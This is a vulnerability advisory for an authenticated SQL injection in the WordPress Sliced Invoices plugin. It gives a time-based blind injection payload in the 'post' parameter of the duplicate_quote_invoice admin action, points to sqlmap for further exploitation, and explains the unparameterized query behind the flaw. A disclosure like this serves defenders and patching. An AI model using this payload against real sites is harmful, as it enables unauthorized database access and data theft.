Wordpress Sliced Invoices plugin with a version lower then 3.8.2 is affected by an Authenticated SQL Injection vulnerability. Note that this vulnerability is highly similar to Wordpress Sliced Invoices <= 3.8.2 Authenticated Reflected XSS due to the use of the same GET parameter.
Intial submission of the vulnerability
# Exploit Title: Wordpress Sliced Invoices <= 3.8.2 Authenticated SQL Injection Vulnerability # Date: 22-10-2019 # Exploit Author: Lucian Ioan Nitescu # Contact: https://twitter.com/LucianNitescu # Webiste: https://nitesculucian.github.io # Vendor Homepage: https://slicedinvoices.com/ # Software Link: https://wordpress.org/plugins/sliced-invoices/ # Version: 3.8.2 # Tested on: Ubuntu 18.04 / Wordpress 5.3 1. Description: Wordpress Sliced Invoices plugin with a version lower then 3.8.2 is affected by an Authenticated SQL Injection vulnerability. 2. Proof of Concept: Authenticated SQL Injection: - Using an Wordpress user, access <your target> /wp-admin/admin.php?action=duplicate_quote_invoice&post=8%20and%20(select*from(select(sleep(20)))a)--%20 - The response will be returned after 20 seconds proving the successful exploitation of the vulnerability. - Sqlmap can be used to further exploit the vulnerability.
Detailed analysis of the vulnerability
wp-content/plugins/sliced-invoices/admin/class-sliced-admin.php at line number
2202 we can observe the use of non parameterized queries using
$wpdb->get_results() with user-supplied data:
$post_meta_infos = ("SELECT meta_key, meta_value FROM $wpdb->postmeta WHERE post_id=$post_id");
$post_id variable is assigned on line
/* * get the original post id */ $post_id = (isset($_GET['post']) ? $_GET['post'] : $_POST['post']);
This vulnerability could be easily exploited by accessing
example.com is your target. To retrieve more data you can use the sqlmap tool over the affected target URL.
How to fix
Update to the latest available version of the Sliced Invoices plugin.
- Exploit Database: https://www.exploit-db.com/exploits/47540
- Packet Storm: https://packetstormsecurity.com/files/154953/WordPress-Sliced-Invoices-3.8.2-SQL-Injection.html